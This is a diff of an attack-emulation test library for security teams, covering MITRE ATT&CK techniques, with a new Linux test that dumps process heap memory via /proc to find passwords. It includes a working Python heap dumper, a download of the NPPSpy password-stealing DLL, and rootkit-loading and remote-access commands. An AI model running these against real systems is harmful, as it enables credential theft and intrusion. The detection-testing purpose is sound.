+echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+```
+##### Description: Requires Python
+##### Check Prereq Commands:
+```sh
+(which python || which python3 || which python2)
+```
+##### Get Prereq Commands:
+```sh
+echo "Python 2.7+ or 3.4+ must be installed"
+```
+
+
+
+
+<br/>

atomics/T1003.007/T1003.007.yaml

@@ -0,0 +1,106 @@
+---
+attack_technique: T1003.007
+display_name: 'OS Credential Dumping: Proc Filesystem'
+atomic_tests:
+- name: Dump individual process memory with sh (Local)
+  auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to
+    copy process memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /proc/"$PID"/maps | grep heap | cut -d' ' -f 1)
+      MEM_START=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f1))))
+      MEM_STOP=$(echo $((0x$(echo "$HEAP_MEM" | cut -d"-" -f2))))
+      MEM_SIZE=$(echo $((0x$MEM_STOP-0x$MEM_START)))
+      dd if=/proc/"${PID}"/mem of="#{output_file}" ibs=1 skip="$MEM_START" count="$MEM_SIZE"
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"
+
+- name: Dump individual process memory with Python (Local)
+  auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63
+  description: |
+    Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to
+    copy a process's heap memory to an external file so it can be searched or exfiltrated later.
+
+  supported_platforms:
+    - linux
+
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: /tmp/T1003.007.bin
+    script_path:
+      description: Path to script generating the target process
+      type: Path
+      default: /tmp/T1003.007.sh
+    python_script:
+      description: Path to script generating the target process
+      type: Path
+      default: PathToAtomicsFolder/T1003.007/src/dump_heap.py
+    pid_term:
+      description: Unique string to use to identify target process
+      type: String
+      default: T1003.007
+
+  dependencies:
+    - description: |
+        Script to launch target process must exist
+      prereq_command: |
+        test -f #{script_path}
+        grep "#{pid_term}" #{script_path}
+      get_prereq_command: |
+        echo '#!/bin/sh' > #{script_path}
+        echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path}
+    - description: |
+        Requires Python
+      prereq_command: |
+        (which python || which python3 || which python2)
+      get_prereq_command: |
+        echo "Python 2.7+ or 3.4+ must be installed"
+
+  executor:
+    name: sh
+    elevation_required: true
+    command: |
+      sh #{script_path}
+      PID=$(pgrep -n -f "#{pid_term}")
+      PYTHON=$(which python || which python3 || which python2)
+      $PYTHON #{python_script} $PID #{output_file}
+      grep -i "PASS" "#{output_file}"
+    cleanup_command: |
+      rm -f "#{output_file}"

atomics/T1003.007/src/dump_heap.py

@@ -0,0 +1,31 @@
+#!/usr/bin/env python
+'''Dump a process's heap space to disk
+
+Usage:
+    python dump_proc.py <PID> <filepath>
+'''
+import argparse
+
+
+parser = argparse.ArgumentParser(description='Dump a process\'s heap space to disk')
+parser.add_argument('pid', type=int, help='ID of process to dump')
+parser.add_argument('filepath', help='A filepath to save output to')
+args = parser.parse_args()
+
+process_id = args.pid
+output_file = args.filepath
+
+with open("/proc/{}/maps".format(process_id), "r") as maps_file:
+    # example: 5566db1a6000-5566db4f0000 rw-p 00000000 00:00 0    [heap]
+    heap_line = next(filter(lambda line: "[heap]" in line, maps_file))
+    heap_range = heap_line.split(' ')[0]
+    mem_start = int(heap_range.split('-')[0], 16)
+    mem_stop = int(heap_range.split('-')[1], 16)
+    mem_size = mem_stop - mem_start
+
+with open("/proc/{}/mem".format(process_id), "rb") as mem_file:
+    mem_file.seek(mem_start, 0)
+    heap_mem = mem_file.read(mem_size)
+
+with open(output_file, "wb") as ofile:
+    ofile.write(heap_mem)

atomics/T1003.008/T1003.008.md

@@ -20,10 +20,14 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
 
@@ -54,10 +58,14 @@ rm -f #{output_file}
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where captured results will be placed | Path | /tmp/T1003.008.txt|
 

atomics/T1003/T1003.md

@@ -27,10 +27,14 @@ If you see a message saying "The system cannot find the path specified", try usi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
 | gsecdump_bin_hash | File hash of the Gsecdump binary file | String | 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC|
@@ -51,7 +55,7 @@ If you see a message saying "The system cannot find the path specified", try usi
 ##### Description: Gsecdump must exist on disk at specified location (#{gsecdump_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -78,6 +82,10 @@ NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NP
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6
+
+
+
 
 
 
@@ -114,10 +122,11 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
 ##### Description: NPPSpy.dll must be available in local temp directory
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} 
+if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
 ```
 

atomics/T1003/T1003.yaml

@@ -61,6 +61,7 @@ atomic_tests:
   - description: NPPSpy.dll must be available in local temp directory 
     prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
     get_prereq_command: |-
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
   executor:
     command: |-

atomics/T1006/T1006.md

@@ -25,10 +25,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | volume | Drive letter of the volume to access | string | C:|
 

atomics/T1007/T1007.md

@@ -19,6 +19,10 @@ Upon successful execution, cmd.exe will execute service commands with expected r
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
+
+
+
 
 
 
@@ -47,10 +51,14 @@ Upon successful execution, net.exe will run from cmd.exe that queries services.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt|
 

atomics/T1010/T1010.md

@@ -17,10 +17,14 @@ Upon successful execution, powershell will download the .cs from the Atomic Red
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | input_source_code | Path to source of C# code | path | PathToAtomicsFolder\T1010\src\T1010.cs|
 | output_file_name | Name of output binary | string | %TEMP%\T1010.exe|
@@ -45,7 +49,7 @@ del /f /q /s #{output_file_name} >nul 2>&1
 ##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{input_source_code}) {exit 0} else {exit 1} 
+if (Test-Path #{input_source_code}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1012/T1012.md

@@ -23,6 +23,10 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
+
+
+
 
 
 

atomics/T1014/T1014.md

@@ -21,10 +21,14 @@ Loadable Kernel Module based Rootkit
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** dfb50072-e45a-4c75-a17e-a484809c8553
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -50,7 +54,7 @@ sudo rmmod #{rootkit_name}
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; 
+if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -73,10 +77,14 @@ Loadable Kernel Module based Rootkit
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 75483ef8-f10f-444a-bf02-62eb0e48db6f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rootkit_source_path | Path to the rootkit source. Used when prerequistes are fetched. | path | PathToAtomicsFolder/T1014/src/Linux|
 | rootkit_path | Path To rootkit | String | PathToAtomicsFolder/T1014/bin/T1014.ko|
@@ -104,7 +112,7 @@ sudo depmod -a
 ##### Description: The kernel module must exist on disk at specified location (#{rootkit_path})
 ##### Check Prereq Commands:
 ```bash
-if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; 
+if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash
@@ -136,10 +144,14 @@ This will simulate hiding a process.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8e4e1985-9a19-4529-b4b8-b7a49ff87fae
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | driver_path | Path to a vulnerable driver | Path | C:\Drivers\driver.sys|
 | puppetstrings_path | Path of puppetstrings.exe | Path | PathToAtomicsFolder\T1014\bin\puppetstrings.exe|
@@ -159,7 +171,7 @@ This will simulate hiding a process.
 ##### Description: puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} 
+if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1016/T1016.md

@@ -33,6 +33,10 @@ Upon successful execution, cmd.exe will spawn multiple commands to list network
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 970ab6a1-0157-4f3f-9a73-ec4166754b23
+
+
+
 
 
 
@@ -63,6 +67,10 @@ Upon successful execution, cmd.exe will spawn netsh.exe to list firewall rules.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 038263cb-00f4-4b0a-98ae-0696c67e1752
+
+
+
 
 
 
@@ -89,6 +97,10 @@ Upon successful execution, sh will spawn multiple commands and output will be vi
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** c141bbdb-7fca-4254-9fd6-f47e79447e17
+
+
+
 
 
 
@@ -118,6 +130,10 @@ Upon successful execution, cmd.exe will spawn `ipconfig /all`, `net config works
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dafaf052-5508-402d-bf77-51e0700c02e2
+
+
+
 
 
 
@@ -148,10 +164,14 @@ Upon successful execution, powershell will read top-128.txt (ports) and contact
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4b467538-f102-491d-ace7-ed487b853bf5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path of file to write port scan results | Path | $env:USERPROFILE\Desktop\open-ports.txt|
 | portfile_url | URL to top-128.txt | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt|
@@ -201,7 +221,7 @@ Remove-Item -ErrorAction ignore "#{output_file}"
 ##### Description: Test requires #{port_file} to exist
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{port_file}") {exit 0} else {exit 1} 
+if (Test-Path "#{port_file}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -222,10 +242,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9bb45dd7-c466-4f93-83a1-be30e56033ee
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
 
@@ -244,7 +268,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -263,10 +287,14 @@ A list of commands known to be performed by Qakbot for recon purposes
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 121de5c6-5818-4868-b8a7-8fd07c455c1b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | recon_commands | File that houses list of commands to be executed | Path | PathToAtomicsFolder\T1016\src\qakbot.bat|
 
@@ -296,6 +324,10 @@ Using `socketfilterfw`, flags such as --getglobalstate or --listapps can be used
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** ff1d8c25-2aa4-4f18-a425-fede4a41ee88
+
+
+
 
 
 

atomics/T1018/T1018.md

@@ -39,6 +39,10 @@ Upon successful execution, cmd.exe will execute `net.exe view` and display resul
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 85321a9c-897f-4a60-9f20-29788e50bccd
+
+
+
 
 
 
@@ -66,6 +70,10 @@ Upon successful execution, cmd.exe will execute cmd.exe against Active Directory
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f1bf6c8f-9016-4edf-aff9-80b65f5d711f
+
+
+
 
 
 
@@ -92,10 +100,14 @@ Upon successful execution, cmd.exe will execute nltest.exe against a target doma
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 52ab5108-3f6f-42fb-8ba3-73bc054f22c8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | target_domain | Domain to query for domain controllers | String | domain.local|
 
@@ -123,6 +135,10 @@ Upon successful execution, cmd.exe will perform a for loop against the 192.168.1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6db1f57f-d1d5-4223-8a66-55c9c65a9592
+
+
+
 
 
 
@@ -149,6 +165,10 @@ Upon successful execution, cmd.exe will execute arp to list out the arp cache. O
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2d5a61f5-0447-4be4-944a-1f8530ed6574
+
+
+
 
 
 
@@ -175,6 +195,10 @@ Upon successful execution, sh will execute arp to list out the arp cache. Output
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** acb6b1ff-e2ad-4d64-806c-6c35fe73b951
+
+
+
 
 
 
@@ -192,7 +216,7 @@ arp -a | grep -v '^?'
 ##### Description: Check if arp command exists on the machine
 ##### Check Prereq Commands:
 ```sh
-if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; 
+if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -213,10 +237,14 @@ Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 an
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 96db2632-8417-4dbb-b8bb-a8b92ba391de
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | start_host | Subnet used for ping sweep. | string | 1|
 | stop_host | Subnet used for ping sweep. | string | 254|
@@ -246,6 +274,10 @@ Upon successful execution, powershell will identify the ip range (via ipconfig)
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** baa01aaa-5e13-45ec-8a0d-e46c93c9760f
+
+
+
 
 
 
@@ -277,10 +309,14 @@ Successful execution of this test will list dns zones in the terminal.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 95e19466-469e-4316-86d2-1dc401b5a959
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username including domain. | string | domain\user|
 | acct_pass | Account password. | string | password|
@@ -301,7 +337,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1} 
+if (python --version) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -310,7 +346,7 @@ echo "Python 3 must be installed manually"
 ##### Description: Computer must have pip installed
 ##### Check Prereq Commands:
 ```powershell
-if (pip3 -V) {exit 0} else {exit 1} 
+if (pip3 -V) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -319,7 +355,7 @@ echo "PIP must be installed manually"
 ##### Description: adidnsdump must be installed and part of PATH
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1} 
+if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -339,10 +375,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a889f5be-2d54-4050-bd05-884578748bb4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
 
@@ -361,7 +401,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -381,10 +421,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5838c31e-a0e2-4b9f-b60a-d79d2cb7995e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder\T1087.002\src\AdFind.exe|
 
@@ -403,7 +447,7 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1020/T1020.md

@@ -19,10 +19,14 @@ Deletes a created file
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file | Exfiltration File | String | C:\temp\T1020_exfilFile.txt|
 | domain | Destination Domain | url | https://google.com|

atomics/T1021.001/T1021.001.md

@@ -21,10 +21,14 @@ Attempt an RDP session via Remote Desktop Application to a DomainController.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 355d4632-8cb9-449d-91ce-b566d0253d3e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("\")|
 | domain | domain argument default %USERDOMAIN% | String | $Env:USERDOMAIN|
@@ -56,7 +60,7 @@ if(-not ([string]::IsNullOrEmpty($p.PID))) { Stop-Process -Id $p.PID }
 ##### Description: Computer must be domain joined
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -75,10 +79,14 @@ Attempt an RDP session via Remote Desktop Application over Powershell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7382a43e-f19c-46be-8f09-5c63af7d3e2b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | logonserver | ComputerName | String | WIN-DC|
 | username | Username | String | Administrator|

atomics/T1021.002/T1021.002.md

@@ -25,10 +25,14 @@ Connecting To Remote Shares
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 3386975b-367a-4fbb-9d77-4dcf3639ffd3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | String | DOMAIN\Administrator|
 | share_name | Examples C$, IPC$, Admin$ | String | C$|
@@ -57,10 +61,14 @@ Map Admin share utilizing PowerShell
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 514e9cd7-9207-4882-98b1-c8f791bae3c5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | share_name | Examples C$, IPC$, Admin$ | String | C$|
 | map_name | Mapped Drive Letter | String | g|
@@ -88,10 +96,14 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0eb03d41-79e4-4393-8e57-6344856be1cf
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_path | File to copy and execute | Path | C:\Windows\System32\cmd.exe|
 | remote_host | Remote computer to receive the copy and execute the file | String | \\localhost|
@@ -112,7 +124,7 @@ Copies a file to a remote host and executes it using PsExec. Requires the downlo
 ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} 
+if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -135,10 +147,14 @@ This technique is used by post-exploitation frameworks.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d41aaab5-bdfe-431d-a3d5-c29e9136ff46
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Remote computer to receive the copy and execute the file | String | output.txt|
 | command_to_execute | Command to execute for output. | String | hostname|

atomics/T1021.003/T1021.003.md

@@ -27,10 +27,14 @@ Upon successful execution, cmd will spawn calc.exe on a remote computer.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | Name of Computer | string | localhost|
 

atomics/T1021.006/T1021.006.md

@@ -23,6 +23,10 @@ Upon successful execution, powershell will "Enable-PSRemoting" allowing for remo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9059e8de-3d7d-4954-a322-46161880b9cf
+
+
+
 
 
 
@@ -49,10 +53,14 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5295bd61-bd7e-4744-9d52-85962a4cf2d6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | host_name | Remote Windows Host Name | String | localhost|
 | remote_command | Command to execute on remote Host | String | ipconfig|
@@ -79,10 +87,14 @@ An adversary may attempt to use Evil-WinRM with a valid account to interact with
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | Username | string | Domain\Administrator|
 | destination_address | Remote Host IP or Hostname | string | Target|
@@ -103,7 +115,7 @@ evil-winrm -i #{destination_address} -u #{user_name} -p #{password}
 ##### Description: Computer must have Ruby Installed
 ##### Check Prereq Commands:
 ```powershell
-if (ruby -v) {exit 0} else {exit 1} 
+if (ruby -v) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -114,7 +126,7 @@ Start-Process $file1 /S;
 ##### Description: Computer must have Evil-WinRM installed
 ##### Check Prereq Commands:
 ```powershell
-if (evil-winrm -h) {exit 0} else {exit 1} 
+if (evil-winrm -h) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell

atomics/T1027.001/T1027.001.md

@@ -19,10 +19,14 @@ Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expe
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary|
 
@@ -45,7 +49,7 @@ rm #{file_to_pad}
 ##### Description: The binary must exist on disk at specified location (#{file_to_pad})
 ##### Check Prereq Commands:
 ```bash
-if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi; 
+if [ -f #{file_to_pad} ]; then exit 0; else exit 1; fi;
 ```
 ##### Get Prereq Commands:
 ```bash

atomics/T1027.002/T1027.002.md

@@ -24,10 +24,14 @@ No other protection/compression were applied.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 11c46cd8-e471-450e-acb8-52a1216ae6a4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | bin_path | Packed binary | Path | PathToAtomicsFolder/T1027.002/bin/linux/test_upx|
 
@@ -60,10 +64,14 @@ by some methods, and especially UPX is not able to uncompress it any more.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** f06197f8-ff46-48c2-a0c6-afc1b50665e1
+
+
+
 
 
 #### Inputs:
